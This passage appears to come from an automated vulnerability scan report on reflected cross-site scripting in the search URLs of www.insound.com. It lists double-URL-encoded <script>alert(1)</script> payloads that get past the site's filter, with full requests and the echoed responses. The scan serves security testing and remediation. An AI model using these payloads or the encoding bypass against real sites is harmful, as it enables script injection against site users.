Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=mcila420ipfcvoubuipg952up2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:01 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=173658230; expires=Sun, 09-Jan-2011 02:40:01 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=330822554; expires=Sun, 09-Jan-2011 02:40:01 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Forest Swordse41bf"><script>alert(1)</script>f44313cac23" />
...[SNIP]...

1.137. http://www.insound.com/search/query/Games&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Games&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d9a4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9a5df2f5553 was submitted in the REST URL parameter 3. This input was echoed as 3d9a4"><script>alert(1)</script>9a5df2f5553 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Games3d9a4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9a5df2f5553&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:41:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=fb902htu49c0sqdhbuv2l24g31; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:41:08 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=9770952; expires=Sun, 09-Jan-2011 02:41:08 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=208473242; expires=Sun, 09-Jan-2011 02:41:08 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18987

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Games3d9a4"><script>alert(1)</script>9a5df2f5553" />
...[SNIP]...

1.138. http://www.insound.com/search/query/Games&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Games&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 51c62%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eee7e68549e5 was submitted in the REST URL parameter 3. This input was echoed as 51c62</title><script>alert(1)</script>ee7e68549e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Games51c62%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eee7e68549e5&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:41:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=9cvn5tqlgale24cprsgpoae0r7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:41:13 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=220366601; expires=Sun, 09-Jan-2011 02:41:13 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=547788850; expires=Sun, 09-Jan-2011 02:41:13 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Games51c62</title><script>alert(1)</script>ee7e68549e5</title>
...[SNIP]...

1.139. http://www.insound.com/search/query/Gatekeeper&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Gatekeeper&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload e0970%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea57d42ed4d0 was submitted in the REST URL parameter 3. This input was echoed as e0970</title><script>alert(1)</script>a57d42ed4d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Gatekeepere0970%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea57d42ed4d0&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:41:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=uar5ne88ecl4r5ujiqo2rqor33; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:41:14 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=136754500; expires=Sun, 09-Jan-2011 02:41:14 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=558758331; expires=Sun, 09-Jan-2011 02:41:14 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Gatekeepere0970</title><script>alert(1)</script>a57d42ed4d0</title>
...[SNIP]...

1.140. http://www.insound.com/search/query/Gatekeeper&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Gatekeeper&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0b53%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6d515183e90 was submitted in the REST URL parameter 3. This input was echoed as e0b53"><script>alert(1)</script>6d515183e90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Gatekeepere0b53%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6d515183e90&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:41:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=m53809ukru8c34mb96vlbgjm62; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:41:08 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=266628450; expires=Sun, 09-Jan-2011 02:41:08 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=344487155; expires=Sun, 09-Jan-2011 02:41:08 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19002

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Gatekeepere0b53"><script>alert(1)</script>6d515183e90" />
...[SNIP]...

1.141. http://www.insound.com/search/query/Girl%20Talk&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Girl%20Talk&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1c97%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e836d5d1bf12 was submitted in the REST URL parameter 3. This input was echoed as c1c97"><script>alert(1)</script>836d5d1bf12 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Girl%20Talkc1c97%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e836d5d1bf12&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=285ii58ass3npil0j43glorcb1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:58 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=34351931; expires=Sun, 09-Jan-2011 02:39:58 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=193914455; expires=Sun, 09-Jan-2011 02:39:58 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37805

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Girl Talkc1c97"><script>alert(1)</script>836d5d1bf12" />
...[SNIP]...

1.142. http://www.insound.com/search/query/Girl%20Talk&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Girl%20Talk&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 2f89b%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7d249cd0eee was submitted in the REST URL parameter 3. This input was echoed as 2f89b</title><script>alert(1)</script>7d249cd0eee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Girl%20Talk2f89b%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7d249cd0eee&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=2l7i2jaqsa8gr7dkqsu0hrg3s4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:06 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=53570078; expires=Sun, 09-Jan-2011 02:40:06 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=561501986; expires=Sun, 09-Jan-2011 02:40:06 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37885

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Girl Talk2f89b</title><script>alert(1)</script>7d249cd0eee</title>
...[SNIP]...

1.143. http://www.insound.com/search/query/Girls&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Girls&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cdce%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0faee6b0d00 was submitted in the REST URL parameter 3. This input was echoed as 8cdce"><script>alert(1)</script>0faee6b0d00 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Girls8cdce%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0faee6b0d00&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=6odtqrdamccf4kd0dg3v92kkh6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:10 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=28885177; expires=Sun, 09-Jan-2011 02:37:10 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=85691683; expires=Sun, 09-Jan-2011 02:37:10 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18987

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Girls8cdce"><script>alert(1)</script>0faee6b0d00" />
...[SNIP]...

1.144. http://www.insound.com/search/query/Girls&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Girls&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload fd200%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3a4b864f3d was submitted in the REST URL parameter 3. This input was echoed as fd200</title><script>alert(1)</script>3a4b864f3d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Girlsfd200%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3a4b864f3d&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=uhi4unatl6co0dh1a1aoost1j1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:15 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=112971208; expires=Sun, 09-Jan-2011 02:37:15 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=404524950; expires=Sun, 09-Jan-2011 02:37:15 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Girlsfd200</title><script>alert(1)</script>3a4b864f3d</title>
...[SNIP]...

1.145. http://www.insound.com/search/query/Gospel%20Music&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Gospel%20Music&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9888a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9659a3abc71 was submitted in the REST URL parameter 3. This input was echoed as 9888a"><script>alert(1)</script>9659a3abc71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Gospel%20Music9888a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9659a3abc71&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=7vq3i77a79i6ov0e9vqf1agja2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:41 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=162235946; expires=Sun, 09-Jan-2011 02:40:41 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=426443927; expires=Sun, 09-Jan-2011 02:40:41 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37698

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Gospel Music9888a"><script>alert(1)</script>9659a3abc71" />
...[SNIP]...

1.146. http://www.insound.com/search/query/Gospel%20Music&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Gospel%20Music&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 22936%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebb8e1f91af8 was submitted in the REST URL parameter 3. This input was echoed as 22936</title><script>alert(1)</script>bb8e1f91af8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Gospel%20Music22936%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebb8e1f91af8&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=5kpm2mm4pnvibf0hct6jd17ns4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:49 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=405021720; expires=Sun, 09-Jan-2011 02:40:49 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=52611940; expires=Sun, 09-Jan-2011 02:40:49 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Gospel Music22936</title><script>alert(1)</script>bb8e1f91af8</title>
...[SNIP]...

1.147. http://www.insound.com/search/query/Horsepower%20Productions&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Horsepower%20Productions&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload c8120%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e70eeac5c4e7 was submitted in the REST URL parameter 3. This input was echoed as c8120</title><script>alert(1)</script>70eeac5c4e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Horsepower%20Productionsc8120%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e70eeac5c4e7&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=cirdm6in3bvkd2jsg4q7dpefq4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:43 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=471953769; expires=Sun, 09-Jan-2011 02:40:43 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=186815783; expires=Sun, 09-Jan-2011 02:40:43 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Horsepower Productionsc8120</title><script>alert(1)</script>70eeac5c4e7</title>
...[SNIP]...

1.148. http://www.insound.com/search/query/Horsepower%20Productions&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Horsepower%20Productions&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e734%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1c9db3a996 was submitted in the REST URL parameter 3. This input was echoed as 2e734"><script>alert(1)</script>1c9db3a996 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

